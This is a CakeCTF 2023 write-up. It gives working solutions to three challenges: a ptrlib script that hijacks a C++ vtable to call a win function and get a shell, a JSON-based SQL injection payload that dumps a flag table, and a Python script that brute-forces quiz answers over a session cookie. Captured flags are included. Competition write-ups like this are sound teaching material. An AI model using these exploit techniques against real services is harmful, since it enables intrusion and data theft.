# CakeCTF 2023 Writeup ![2023.cakectf.com_ranking_](https://hackmd.io/_uploads/BkgAJQB46.png) ## pwn ### vtable4b > Do you understand what vtable is? > > `nc vtable4b.2023.cakectf.com 9000` > \* The flag exists somewhere in `/` directory. ``` Today, let's learn how to exploit C++ vtable! You're going to abuse the following C++ class: class Cowsay { public: Cowsay(char *message) : message_(message) {} char*& message() { return message_; } virtual void dialogue(); private: char *message_; }; An instance of this class is allocated in the heap: Cowsay *cowsay = new Cowsay(new char[0x18]()); You can 1. Call `dialogue` method: cowsay->dialogue(); 2. Set `message`: std::cin >> cowsay->message(); Last but not least, here is the address of `win` function which you should call to get the flag: <win> = 0x558bdde1a61a 1. Use cowsay 2. Change message 3. Display heap > ``` ``` > 3 [ address ] [ heap data ] +------------------+ 0x558bdfa8dea0 | 0000000000000000 | +------------------+ 0x558bdfa8dea8 | 0000000000000021 | +------------------+ 0x558bdfa8deb0 | 0000000000000000 | <-- message (= '') +------------------+ 0x558bdfa8deb8 | 0000000000000000 | +------------------+ 0x558bdfa8dec0 | 0000000000000000 | +------------------+ 0x558bdfa8dec8 | 0000000000000021 | +------------------+ 0x558bdfa8ded0 | 0000558bdde1dce8 | ---------------> vtable for Cowsay +------------------+ +------------------+ 0x558bdfa8ded8 | 0000558bdfa8deb0 | 0x558bdde1dce8 | 0000558bdde1a6e2 | +------------------+ +------------------+ 0x558bdfa8dee0 | 0000000000000000 | --> Cowsay::dialogue +------------------+ 0x558bdfa8dee8 | 000000000000f121 | +------------------+ ``` ```python from ptrlib import * sock = Socket('vtable4b.2023.cakectf.com', 9000) win_addr = int(sock.recvlineafter('flag:\n').decode()[10:], 16) sock.sendlineafter('> ', b'3') for _ in range(7): sock.recvline() message_addr = int(sock.recvline().decode()[:14], 16) payload = b'' payload += p64(win_addr) payload += b'A' * 0x18 payload += p64(message_addr) sock.sendlineafter('> ', b'2') sock.sendlineafter('Message: ', payload) sock.sendlineafter('> ', b'1') sock.sh() sock.close() ``` #### Flag `CakeCTF{vt4bl3_1s_ju5t_4n_arr4y_0f_funct1on_p0int3rs}` ## web ### Country DB > Do you know which country code 'CA' and 'KE' are for? > Search country codes here! ```javascript fetch('/api/search', { method: 'POST', headers: { 'content-type': 'application/json', }, body: JSON.stringify({ code: [ '\') union select flag from flag --', '', ], }) }); ``` #### Flag `CakeCTF{b3_c4refUl_wh3n_y0U_u5e_JS0N_1nPut}` ### TOWFL > Do you speak the language of wolves? > Prove your skill here! ```python import json import requests base_url = 'http://towfl.2023.cakectf.com:8888' def main(): answers = [[None] * 10 for _ in range(10)] r = requests.post(f'{base_url}/api/start') cookies = r.cookies for i in range(10): for j in range(10): for k in range(4): answers[i][j] = k r = requests.post(f'{base_url}/api/submit', json=answers, cookies=cookies) r = requests.get(f'{base_url}/api/score', cookies=cookies) data = r.json() if data['data']['score'] == i * 10 + j + 1: if data['data']['score'] == 100: print(data['data']['flag']) return else: break if __name__ == '__main__': main() ``` #### Flag `CakeCTF{b3_c4ut10us_1f_s3ss10n_1s_cl13nt_s1d3_0r_s3rv3r_s1d3}`